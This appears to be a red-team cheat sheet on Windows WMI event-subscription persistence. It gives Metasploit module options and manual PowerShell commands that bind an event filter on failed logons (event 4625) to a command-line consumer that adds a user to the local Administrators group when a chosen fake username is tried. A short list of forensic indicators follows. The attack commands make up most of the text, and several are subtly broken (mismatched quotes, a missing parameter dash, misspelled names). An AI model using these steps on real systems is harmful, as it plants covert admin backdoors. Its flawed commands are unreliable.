# WMI Persist With Event Filters ### Automation * There are many great automated ways to do this. * * Metasploit post module `exploit/windows/local/wmi_persistence` ``` Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- CALLBACK_INTERVAL 1800000 yes Time between callbacks (In milliseconds). (Default: 1800000). CLASSNAME UPDATER yes WMI event class name. (Default: UPDATER) EVENT_ID_TRIGGER 4625 yes Event ID to trigger the payload. (Default: 4625) PERSISTENCE_METHOD EVENT yes Method to trigger the payload. (Accepted: EVENT, INTERVAL, LOGON, PROCESS, WAITFOR) PROCESS_TRIGGER CALC.EXE yes The process name to trigger the payload. (Default: CALC.EXE) SESSION yes The session to run this module on. USERNAME_TRIGGER BOB yes The username to trigger the payload. (Default: BOB) WAITFOR_TRIGGER CALL yes The word to trigger the payload. (Default: CALL) ``` ### Manual Mode * Check if WMI is enabled, if it is not any `WMI` command that you execute will attempt to download `WMI` * This download process does log in the `WMI Log` * Check if WMI is enabled on the remote system ``` reg query "HKLM\System\CurrentControlSet\Services\Winmgt" Start REG_DWORD 0x2 0x2 --> Auto Start 0x3 --> Demand Start 0x4 --> Disabled #OR get-service Winmgmt ``` * ```
``` #### Check for existing entries * Check for existing event filter consumer bindings that are on the system ``` Get-Wmiobject -Class __FilterToConsumerBinding -NameSpace "root\Subscription" ``` #### Ensure the system is logging event logs for the type of event you want to use * **- i.e. logon, logoff event** ``` auditpol /get /category:* #OR for logon logoff auditpol /get /category:Logon/Logoff --output-- System audit policy Category/Subcategory Setting Logon/Logoff Logon Success and Failure Logoff Success Account Lockout Success IPsec Main Mode No Auditing IPsec Quick Mode No Auditing IPsec Extended Mode No Auditing Special Logon Success Other Logon/Logoff Events No Auditing Network Policy Server Success and Failure User / Device Claims No Auditing Group Membership No Auditing ``` #### Create your own filter and consumer ``` $x='SCM System Log Filter' $z='SCM System Log Consumer' ``` #### Now create the triggering event ``` $q='Select * from __InstanceCreationEvent WITHIN 10 where TargetInstance isa 'Win32-NtLogEvent' and TargetInstance.logfile='Security' and (TargetInstance.EventCode='4625')" ``` #### Now create your event filter ``` $wmifilter=Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$x;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$q} ErrorAction Stop ``` #### Create the event consumer ``` $wmiconsumer=Set-WmiInstance -Class CommandLineEventConsumer -NameSpace "root\subscription" -Arguments @{Name=$z;CommandLineTemplate='C:\\Windows\\System32\\windowspowershell\\v.1.0\\powershell.exe -v 2.0 -nop -c "if(wevtutil qe security /rd:true /f:text /c:1 `"*[System/EventID=4625]`" | findstr /i "fake username here"){net localgroup Administrators /add}"'} ``` #### Combine the filter and the comsumer ``` Set-WmiInstance -Class __FilterToConsumerBinding -NameSpace "root\subscription" -Arguments @{Filter=$wmifilter;Consumer=$wmiconsumer} ``` #### Ensure Its all working and correct ``` Get-WmiObject -Class __FilterToConsumerBinding -NameSpace "root\subscription" ``` ### IOCs Left Behind ``` C:\Windows\System32\Wbem\Repository\INDEX.BTR - Cotnains the names of event filter and event consumer C:\Windows\System32\Wbem\Repository\OBJECTS.DATA - Contains the names of event filter and event comsumer - Contains the command in the event consumer C:\Windows\System32\Wbem\Repository\MAPPING2.MAP - Prefetch Files "HKLM\Software\Microsoft\Wbem\Ess\//./root\CIMV2\MS_NT_EVENT_LOG_EVENT_PROVIDER" ``` #### Other Logs ``` 5857 Active ScriptEventConsumer provider started with result code 0x0 ```